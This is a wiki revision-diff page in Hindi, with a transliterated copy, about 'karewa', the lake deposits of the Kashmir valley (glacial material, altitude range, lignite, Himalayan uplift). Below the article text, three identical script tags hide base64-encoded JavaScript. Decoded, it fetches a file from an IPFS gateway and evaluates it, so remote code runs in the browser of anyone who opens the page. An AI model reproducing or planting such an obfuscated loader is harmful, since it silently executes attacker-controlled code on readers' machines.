Difference between revisions of "करेवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''करेवा''' कश्मीर घाटी के झील निक्षेप हैं। *इनमें हिम...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''करेवा''' [[कश्मीर]] घाटी के झील निक्षेप हैं।
+
'''करेवा''' [[कश्मीर]] घाटी के झील निक्षेप हैं। इनमें हिमानी के मोटे निक्षेप तथा हिमोढ़ उपस्थित होते हैं। निक्षेप तथा हिमोढ़ों के अन्दर अन्य [[पदार्थ]] भी पाये जाते हैं।
*इनमें हिमानी के मोटे निक्षेप तथा हिमोढ़ उपस्थित होते हैं।
+
*जम्मू-कश्मीर राज्य में पीर पंजाल श्रेणियों के पाश्र्वो में 1,500 से 1,850 मीटर की ऊंचाई पर मिलने वाली झीलीय निक्षेपों को करेवा के नाम से जाना जाता है।
*निक्षेप तथा हिमोढ़ों के अन्दर अन्य [[पदार्थ]] भी पाये जाते हैं।
 
 
*कश्मीर घाटी की करेवा में लिग्नाइट प्राप्त होने के संकेत भी मिले हैं।
 
*कश्मीर घाटी की करेवा में लिग्नाइट प्राप्त होने के संकेत भी मिले हैं।
 +
*इनके नीति तल निश्चित रूप से इस ओर संकेत करते हैं कि [[हिमालय पर्वत]] अभिनूतन (प्लायो सीन) युग में भी अपनी उत्थान की प्रक्रिया में था।
  
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भूगोल शब्दावली}}
 
{{भूगोल शब्दावली}}

Latest revision as of 06:43, 2 May 2012

kareva kashmir ghati ke jhil nikshep haian. inamean himani ke mote nikshep tatha himodh upasthit hote haian. nikshep tatha himodhoan ke andar any padarth bhi paye jate haian.

  • jammoo-kashmir rajy mean pir panjal shreniyoan ke pashrvo mean 1,500 se 1,850 mitar ki ooanchaee par milane vali jhiliy nikshepoan ko kareva ke nam se jana jata hai.
  • kashmir ghati ki kareva mean lignait prapt hone ke sanket bhi mile haian.
  • inake niti tal nishchit roop se is or sanket karate haian ki himalay parvat abhinootan (playo sin) yug mean bhi apani utthan ki prakriya mean tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>